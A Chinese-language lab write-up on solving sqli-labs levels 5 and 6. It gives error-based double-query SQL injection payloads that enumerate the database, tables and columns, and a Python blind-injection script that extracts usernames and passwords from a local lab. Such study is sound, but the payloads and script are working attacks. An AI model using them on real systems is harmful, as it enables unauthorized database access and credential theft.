sqli-labs第五、六关(详细)
sqli-labs第五、六关(详细)
-
- 二补
根据提示发现是双查询单引号字符串错误
经过实验发现和前无关注入方法不同
需要补充并理解一下双查询注入的知识,参考网站:详细讲解双查询注入
有了相关知识后就可以进一步注入了
老规矩判断字段数
http://localhost:8080/sqli-labs_2/sqlilabs/Less-5/?id=1%27%20union%20select%20count(*),count(*),concat((select%20database()limit 1,1),floor(rand()*2))%20as%20a%20from%20information_schema.tables%20group%20by%20a%23
如果没出来多刷新几次,为什么呢
因为这个bug是有概率触发的
为什么有这两种反馈呢
因为floor(rand()*2)结果只有0和1,返回的结果就会出现结果加上0或结果加上1
然后查找数据库名的时候遇到一个问题
这里可以用hex编码解决
union select count(*),count(*),hex(concat((select database()),floor(rand()*2))) as a from information_schema.tables group by a%23
然后把“73656375726974793”拿去解码就能得到数据库名
用户和版本信息方法和上面一样
正常情况可能可以直接查询出内容并不会出现编码问题,就不用加hex()
union select count(*),count(*),concat((select table_name from information_schema.tables where table_schema='security'),floor(rand()*2)) as a from information_schema.tables group by a%23
然后出现这种问题
经过测试发现可能经过了设置只显示一行内容
需要限制一下返回
在’security’后面加limit 0,1
查询其他表就limit 1,1、limit 2,1
然后发现这四张表
uagents
referers
emails
users
获得字段名和表名一样
union select count(*),count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a%23
然后获取数据
第六关和第五关差异不大,由单引号变成了双引号错误。
二补
既然只会给正确两种情况的反馈,还可以考虑盲注。
要用如下几个函数
substr(内容,n,m)从内容的第n位截取m个
length()
还有一个关键的sql语句
?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema =database()
),1,1)='u'--+
手动和burp suite 比较麻烦,写代码能力也不行,只能将就看看了
import requests
url = 'http://localhost/sqlilabs/Less-5/?id=1\''
datalens = 0
datanamee = ''
sign = "You are in..........."
tablename = ''
columnlist = ''
list1= ['id','username','password','user','currentconnections','totalconnections']
valuelist = ''
#数据库长度
for i in range(10):
rl = str(i)
lenurl = url + "and length(database())=" + rl + "--+"
r = requests.get(lenurl)
if sign in r.text:
print("database len " + str(i))
datalens = i + 1
#数据库名
wordlist = "abcdefghijklmnopqrstuvwxyz"
for i in range(1,datalens):
dataname = url + "and substr(database()," + str(i) + "," +"1)"
for w in wordlist:
datanames = dataname + "=" + "'" + w + "'" + "--+"
r = requests.get(datanames)
if sign in r.text:
datanamee += w
print("database name " + datanamee)
#数据库表名
wordlist2 = "abcdefghijklmnopqrstuvwxyz,"
for i in range(1,100):
tableurl1 = url + " and substr((select group_concat(table_name) from information_schema.tables where table_schema = database())," + str(i) + ",1)="
for v in wordlist2:
tableurl = tableurl1 + "\'" + v + "\'" + "--+"
r = requests.get(tableurl)
if sign in r.text:
tablename += v
print("database table " + tablename)
#数据库字段名
for i in range(1,100):
columnurl1 = url + " and substr((select group_concat(column_name) from information_schema.columns where table_name = \'users\' )," + str(i) + ",1)="
for v in wordlist2:
columnurl = columnurl1 + "\'" + v + "\'" + "--+"
r = requests.get(columnurl)
if sign in r.text:
columnlist += v
print("database colum " + columnlist)
#数据库元组
wordlist2 = "0123456789abcdefghijklmnopqrstuvwxyz,=-_/\\."
for n in range(6):
for i in range(1,200):
valueurl1 = url + " and substr((select group_concat(" + list1[n] + ") from users )," + str(i) + ",1)="
for v in wordlist2:
valueurl = valueurl1 + "\'" + v + "\'" + "--+"
r = requests.get(valueurl)
if sign in r.text:
valuelist += v
print("database " + list1[n] + ' ' + valuelist)
valuelist = ''
总结:
不同于前四关,需要补充双注入的知识,多做尝试。